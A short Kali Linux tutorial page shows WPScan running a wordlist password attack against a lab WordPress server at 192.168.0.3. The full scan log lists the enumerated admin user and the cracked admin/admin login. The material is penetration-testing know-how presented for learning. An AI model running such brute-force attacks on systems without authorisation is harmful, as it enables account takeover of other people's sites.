Categories
Kali Linux

WPScan

WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.

WPScan

The following command runs password-attack to wordpress server(192.168.0.3/wordpress). –passwords option requires password file that contains a list of passwords to use during the password attack.

One of the easiest ways to prepare the password file is to use Openwall wordlists collection(https://download.openwall.net/). The following command uses the file named “password” as its list of passwords, which downloaded from /pub/wordlists/passwords directory.

kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

 [+] URL: http://192.168.0.3/wordpress/
 [+] Started: Mon Apr 25 00:00:00 20xx

Interesting Finding(s):

 [+] http://192.168.0.3/wordpress/
 | Interesting Entry: Server: Apache/2.4.38 (Raspbian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

 [+] http://192.168.0.3/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://wordpress_ghost_scanner
 |  - https://wordpress_xmlrpc_dos
 |  - https://wordpress_xmlrpc_login
 |  - https://wordpress_pingback_access

 [+] http://192.168.0.3/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.0.3/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4 identified (Latest, released on 2020-03-31).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups -: |=============================================|

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs -: |============================================|

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s

Progress: |=================================================
[SUCCESS] - admin / admin
Progress: |===============================================================|

[i] Valid Combinations Found:
 | Username: admin, Password: admin

[+] Finished: Mon Apr 25 00:00:00 20xx
[+] Requests Done: 2895
[+] Cached Requests: 5
[+] Data Sent: 1.42 MB
[+] Data Received: 16.047 MB
[+] Memory used: 132.027 MB
[+] Elapsed time: 00:02:43

The log shows that wpscan found admin/admin account-password pair in 3 minutes.

Note: wpscan requires internet access to update its database. If the network is unreachable to the database server, wpscan aborted.

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

 [i] Updating the Database ...

Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)